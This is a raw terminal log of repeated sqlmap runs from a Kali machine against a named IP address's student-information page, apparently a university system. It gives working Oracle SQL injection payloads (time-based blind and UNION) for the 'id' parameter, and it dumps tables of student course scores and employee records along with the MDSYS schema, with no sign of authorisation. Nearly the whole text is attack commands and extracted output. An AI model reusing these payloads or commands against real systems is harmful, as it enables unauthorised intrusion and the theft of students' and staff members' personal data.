+------------------------+------+-------+--------+--------+----------+------------+-------------+--------------+--------------+---------------+----------------+-----------------+------------------+
[10:52:03] [INFO] table 'XDGSNEW.BASE_EMPLOYEE160920' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/XDGSNEW/BASE_EMPLOYEE160920.csv'
[10:52:03] [INFO] fetching columns for table 'ST_COURSESCORE_140625QXK' in database 'XDGSNEW'
[10:52:03] [INFO] the SQL query used returns 27 entries
[10:52:04] [INFO] retrieved: "CREDITHOURNUM","NUMBER"
[10:52:04] [INFO] retrieved: "TEACHCLASSID","VARCHAR2"
[10:52:04] [INFO] retrieved: "EMPLOYEEID","VARCHAR2"
[10:52:05] [INFO] retrieved: "REMARK","VARCHAR2"
[10:52:05] [INFO] retrieved: "COURSENO","VARCHAR2"
[10:52:05] [INFO] retrieved: "COURSENAME","VARCHAR2"
[10:52:06] [INFO] retrieved: "COURSEDEPARTMENT","VARCHAR2"
[10:52:06] [INFO] retrieved: "STUDENTID","VARCHAR2"
[10:52:06] [INFO] retrieved: "COURSEID","VARCHAR2"
[10:52:07] [INFO] retrieved: "STUDYTIMES","NUMBER"
[10:52:07] [INFO] retrieved: "TERMID","VARCHAR2"
[10:52:07] [INFO] retrieved: "ISDEGREECOURSE","VARCHAR2"
[10:52:08] [INFO] retrieved: "SCORETYPEID","VARCHAR2"
[10:52:08] [INFO] retrieved: "DAILYSCORE","NUMBER"
[10:52:08] [INFO] retrieved: "EXAMSCORE","VARCHAR2"
[10:52:08] [INFO] retrieved: "SCORE100","NUMBER"
[10:52:09] [INFO] retrieved: "SCOREREMARK","VARCHAR2"
[10:52:09] [INFO] retrieved: "ACCOUNT","NUMBER"
[10:52:09] [INFO] retrieved: "GRADESTATUS","VARCHAR2"
[10:52:10] [INFO] retrieved: "INPUTACCOUNT","VARCHAR2"
[10:52:10] [INFO] retrieved: "INPUTDATE","DATE"
[10:52:10] [INFO] retrieved: "AUDITACCOUNT","VARCHAR2"
[10:52:10] [INFO] retrieved: "AUDITDATE","DATE"
[10:52:11] [INFO] retrieved: "LASTMODIFYDATE","DATE"
[10:52:11] [INFO] retrieved: "LASTMODIFYACCOUNT","VARCHAR2"
[10:52:11] [INFO] retrieved: "MODIFYHISTORY","VARCHAR2"
[10:52:12] [INFO] retrieved: "VOLUMENO","NUMBER"
[10:52:12] [INFO] fetching entries for table 'ST_COURSESCORE_140625QXK' in database 'XDGSNEW'
[10:52:12] [INFO] fetching number of entries for table 'ST_COURSESCORE_140625QXK' in database 'XDGSNEW'
[10:52:12] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
111972
[10:53:36] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2
[10:54:10] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[10:54:59] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
06122122055410296204
[11:00:34] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
????
[11:12:34] [ERROR] invalid character detected. retrying..
??
[11:16:21] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
LS0
[11:18:25] [ERROR] invalid character detected. retrying..
[11:19:38] [ERROR] invalid character detected. retrying..
[11:20:02] [ERROR] invalid character detected. retrying..
[11:20:27] [ERROR] invalid character detected. retrying..
[11:20:49] [ERROR] invalid character detected. retrying..
0224$e
[11:23:06] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2
[11:23:47] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
0
[11:24:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:25:24] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
92
[11:26:23] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
?
[11:31:16] [ERROR] invalid character detected. retrying..
[11:31:48] [ERROR] invalid character detected. retrying..
[11:32:23] [ERROR] invalid character detected. retrying..
?
[11:33:02] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
a00
[11:34:32] [ERROR] invalid character detected. retrying..
[11:34:46] [ERROR] invalid character detected. retrying..
1
[11:35:00] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:36:01] [ERROR] invalid character detected. retrying..
22-D^C
[11:37:31] [WARNING] Ctrl+C detected in dumping phase
Database: XDGSNEW
Table: ST_COURSESCORE_140625QXK
[1 entry]
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+
| COURSEID | EMPLOYEEID | ACCOUNT | COURSENO | AUDITDATE | INPUTDATE | EXAMSCORE | DAILYSCORE | COURSENAME | GRADESTATUS | AUDITACCOUNT | INPUTACCOUNT | CREDITHOURNUM | COURSEDEPARTMENT |
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+
| 06122122055410296204 | <blank> | 2 | LS00224$e | NULL | 92 | 0 | ?????? | ?? | NULL | a001 | 2 | NULL |
+----------------------+------------+---------+-----------+-----------+-----------+-----------+------------+------------+-------------+--------------+--------------+---------------+------------------+
[11:37:31] [INFO] table 'XDGSNEW.ST_COURSESCORE_140625QXK' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/XDGSNEW/ST_COURSESCORE_140625QXK.csv'
[11:37:31] [INFO] fetching columns for table 'SYS_USERROLE_BAK' in database 'XDGSNEW'
[11:37:32] [INFO] the SQL query used returns 2 entries
[11:37:32] [INFO] retrieved: "ROLECODE","VARCHAR2"
[11:37:32] [INFO] retrieved: "USERACCOUNT","VARCHAR2"
[11:37:32] [INFO] fetching entries for table 'SYS_USERROLE_BAK' in database 'XDGSNEW'
[11:37:32] [INFO] fetching number of entries for table 'SYS_USERROLE_BAK' in database 'XDGSNEW'
[11:37:32] [WARNING] (case) time-based comparison requires larger statistical model, please wait........^C
[11:37:35] [ERROR] user aborted
[*] shutting down at 11:37:35
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:40:36
[11:40:39] [INFO] resuming back-end DBMS 'oracle'
[11:40:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:40:39] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:40:39] [INFO] fetching tables for database: 'MDSYS'
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] y
[11:40:50] [INFO] the SQL query used returns 18 entries
[11:40:50] [INFO] retrieved: CS_SRS
[11:40:50] [INFO] retrieved: MD$RELATE
[11:40:50] [INFO] retrieved: OGIS_GEOMETRY_COLUMNS
[11:40:50] [INFO] retrieved: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:40:51] [INFO] retrieved: SDO_ANGLE_UNITS
[11:40:51] [INFO] retrieved: SDO_AREA_UNITS
[11:40:51] [INFO] retrieved: SDO_DATUMS
[11:40:51] [INFO] retrieved: SDO_DIST_UNITS
[11:40:51] [INFO] retrieved: SDO_ELLIPSOIDS
[11:40:51] [INFO] retrieved: SDO_GEOM_METADATA_TABLE
[11:40:51] [INFO] retrieved: SDO_INDEX_METADATA_TABLE
[11:40:51] [INFO] retrieved: SDO_LRS_METADATA_TABLE
[11:40:51] [INFO] retrieved: SDO_MAPS_TABLE
[11:40:51] [INFO] retrieved: SDO_PROJECTIONS
[11:40:51] [INFO] retrieved: SDO_STYLES_TABLE
[11:40:51] [INFO] retrieved: SDO_THEMES_TABLE
[11:40:51] [INFO] retrieved: USER_CS_SRS
[11:40:51] [INFO] retrieved: USER_TRANSFORM_MAP
[11:40:51] [INFO] fetching columns for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:40:52] [INFO] the SQL query used returns 4 entries
[11:40:52] [INFO] retrieved: "SDO_OWNER","VARCHAR2"
[11:40:52] [INFO] retrieved: "NAME","VARCHAR2"
[11:40:52] [INFO] retrieved: "DESCRIPTION","VARCHAR2"
[11:40:53] [INFO] retrieved: "DEFINITION","CLOB"
[11:40:53] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:40:53] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:40:53] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[11:41:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
0
[11:41:27] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:41:27] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:41:27] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:41:27] [INFO] the SQL query used returns 6 entries
[11:41:28] [INFO] retrieved: "CS_NAME","VARCHAR2"
[11:41:28] [INFO] retrieved: "SRID","NUMBER"
[11:41:28] [INFO] retrieved: "AUTH_SRID","NUMBER"
[11:41:28] [INFO] retrieved: "AUTH_NAME","VARCHAR2"
[11:41:29] [INFO] retrieved: "WKTEXT","VARCHAR2"
[11:41:29] [INFO] retrieved: "CS_BOUNDS","SDO_GEOMETRY"
[11:41:29] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'
[11:41:29] [INFO] the SQL query used returns 1000 entries
^C
[11:43:30] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:43:30] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:43:30] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
^C
[11:43:41] [ERROR] user aborted
[*] shutting down at 11:43:41
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -T SDO_MAPS_TABLE
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:44:17
[11:44:19] [INFO] resuming back-end DBMS 'oracle'
[11:44:19] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:44:19] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:44:19] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 11:44:19
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -C clo
___
__H__
___ ___[,]_____ ___ ___ {1.1.12#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:44:53
[11:44:53] [INFO] resuming back-end DBMS 'oracle'
[11:44:53] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:44:54] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:44:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 11:44:54
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS -C name
___
__H__
___ ___[.]_____ ___ ___ {1.1.12#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:05
[11:45:05] [INFO] resuming back-end DBMS 'oracle'
[11:45:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:06] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:06] [INFO] fetched data logged to text files under '/root/.sqlmap/output/202.201.33.73'
[*] shutting down at 11:45:06
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
___
__H__
___ ___["]_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:23
[11:45:24] [INFO] resuming back-end DBMS 'oracle'
[11:45:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:24] [INFO] fetching tables for database: 'MDSYS'
[11:45:24] [INFO] the SQL query used returns 18 entries
[11:45:24] [INFO] resumed: CS_SRS
[11:45:24] [INFO] resumed: MD$RELATE
[11:45:24] [INFO] resumed: OGIS_GEOMETRY_COLUMNS
[11:45:24] [INFO] resumed: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:45:24] [INFO] resumed: SDO_ANGLE_UNITS
[11:45:24] [INFO] resumed: SDO_AREA_UNITS
[11:45:24] [INFO] resumed: SDO_DATUMS
[11:45:24] [INFO] resumed: SDO_DIST_UNITS
[11:45:24] [INFO] resumed: SDO_ELLIPSOIDS
[11:45:24] [INFO] resumed: SDO_GEOM_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_INDEX_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_LRS_METADATA_TABLE
[11:45:24] [INFO] resumed: SDO_MAPS_TABLE
[11:45:24] [INFO] resumed: SDO_PROJECTIONS
[11:45:24] [INFO] resumed: SDO_STYLES_TABLE
[11:45:24] [INFO] resumed: SDO_THEMES_TABLE
[11:45:24] [INFO] resumed: USER_CS_SRS
[11:45:24] [INFO] resumed: USER_TRANSFORM_MAP
[11:45:24] [INFO] fetching columns for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:24] [INFO] the SQL query used returns 4 entries
[11:45:24] [INFO] resumed: "SDO_OWNER","VARCHAR2"
[11:45:24] [INFO] resumed: "NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "DESCRIPTION","VARCHAR2"
[11:45:24] [INFO] resumed: "DEFINITION","CLOB"
[11:45:24] [INFO] fetching entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:24] [INFO] fetching number of entries for table 'SDO_MAPS_TABLE' in database 'MDSYS'
[11:45:24] [INFO] resumed: 0
[11:45:24] [WARNING] table 'SDO_MAPS_TABLE' in database 'MDSYS' appears to be empty
Database: MDSYS
Table: SDO_MAPS_TABLE
[0 entries]
+------+-----------+------------+-------------+
| NAME | SDO_OWNER | DEFINITION | DESCRIPTION |
+------+-----------+------------+-------------+
+------+-----------+------------+-------------+
[11:45:24] [INFO] table 'MDSYS.SDO_MAPS_TABLE' dumped to CSV file '/root/.sqlmap/output/202.201.33.73/dump/MDSYS/SDO_MAPS_TABLE.csv'
[11:45:24] [INFO] fetching columns for table 'CS_SRS' in database 'MDSYS'
[11:45:24] [INFO] the SQL query used returns 6 entries
[11:45:24] [INFO] resumed: "CS_NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "SRID","NUMBER"
[11:45:24] [INFO] resumed: "AUTH_SRID","NUMBER"
[11:45:24] [INFO] resumed: "AUTH_NAME","VARCHAR2"
[11:45:24] [INFO] resumed: "WKTEXT","VARCHAR2"
[11:45:24] [INFO] resumed: "CS_BOUNDS","SDO_GEOMETRY"
[11:45:24] [INFO] fetching entries for table 'CS_SRS' in database 'MDSYS'
[11:45:24] [INFO] the SQL query used returns 1000 entries
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
^C
[11:45:40] [WARNING] user aborted during enumeration. sqlmap will display partial output
[11:45:40] [INFO] fetching number of entries for table 'CS_SRS' in database 'MDSYS'
[11:45:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait.....^C
[11:45:42] [ERROR] user aborted
[*] shutting down at 11:45:42
root@kali-yaming:~# sqlmap -u http://202.201.33.73/viewStudentInfoAction.do?id=172081001005 --cookie="JSESSIONID=D2855409C28CE9D9EFD621D6E795AF16" -D MDSYS --dump
___
__H__
___ ___[']_____ ___ ___ {1.1.12#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:45:46
[11:45:47] [INFO] resuming back-end DBMS 'oracle'
[11:45:47] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=172085211005' AND 2892=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(103)||CHR(67)||CHR(105),5) AND 'IkNF'='IkNF
Type: UNION query
Title: Generic UNION query (NULL) - 80 columns
Payload: id=-6239' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(106)||CHR(112)||CHR(120)||CHR(113)||CHR(102)||CHR(99)||CHR(99)||CHR(121)||CHR(74)||CHR(115)||CHR(90)||CHR(87)||CHR(106)||CHR(79)||CHR(111)||CHR(98)||CHR(105)||CHR(108)||CHR(117)||CHR(102)||CHR(106)||CHR(85)||CHR(120)||CHR(107)||CHR(109)||CHR(107)||CHR(122)||CHR(73)||CHR(68)||CHR(122)||CHR(118)||CHR(105)||CHR(117)||CHR(112)||CHR(122)||CHR(116)||CHR(107)||CHR(70)||CHR(108)||CHR(114)||CHR(86)||CHR(102)||CHR(102)||CHR(113)||CHR(113)||CHR(120)||CHR(107)||CHR(120)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- XhXq
---
[11:45:47] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[11:45:47] [INFO] fetching tables for database: 'MDSYS'
[11:45:47] [INFO] the SQL query used returns 18 entries
[11:45:47] [INFO] resumed: CS_SRS
[11:45:47] [INFO] resumed: MD$RELATE
[11:45:47] [INFO] resumed: OGIS_GEOMETRY_COLUMNS
[11:45:47] [INFO] resumed: OGIS_SPATIAL_REFERENCE_SYSTEMS
[11:45:47] [INFO] resumed: SDO_ANGLE_UNITS
[11:45:47] [INFO] resumed: SDO_AREA_UNITS
[11:45:47] [INFO] resumed: SDO_DATUMS
[11:45:47] [INFO] resumed: SDO_DIST_UNITS
[11:45:47] [INFO] resumed: SDO_ELLIPSOIDS
[11:45:47] [INFO] resumed: SDO_GEOM_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_INDEX_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_LRS_METADATA_TABLE
[11:45:47] [INFO] resumed: SDO_MAPS_TABLE
[11:45:47] [INFO] resumed: SDO_PROJECTIONS
[11:45:47] [INFO] resumed: SDO_STYLES_TABLE
[11:45:47] [INFO] resumed: SDO_THEMES_TABLE
[11:45:47] [INFO] resumed: USER_CS_SRS
[11:45:47] [INFO] resumed: USER_TRANSFORM_MAP
[11:45:47] [INFO] fetching columns for table 'SDO_MAPS_TABLE' in database 'MDSYS'
